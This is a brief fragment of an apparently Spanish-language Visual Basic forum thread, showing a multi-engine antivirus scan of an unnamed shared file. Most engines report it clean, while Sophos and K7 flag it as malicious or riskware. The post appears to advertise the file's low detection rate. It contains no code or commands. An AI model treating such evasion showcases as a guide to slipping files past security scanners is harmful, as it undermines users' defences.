Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - Clean!
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Clean!
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBCheMan-D
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Riskware ( ed2edfef0 )
VIPRE - Clean!


Desfrutem y Saludo Bros
#3
Visual Basic / Re:300 SkinS VB6
Julio 03, 2012, 12:15:01 AM
Muy bueno test jaja gracias
#4






Saludos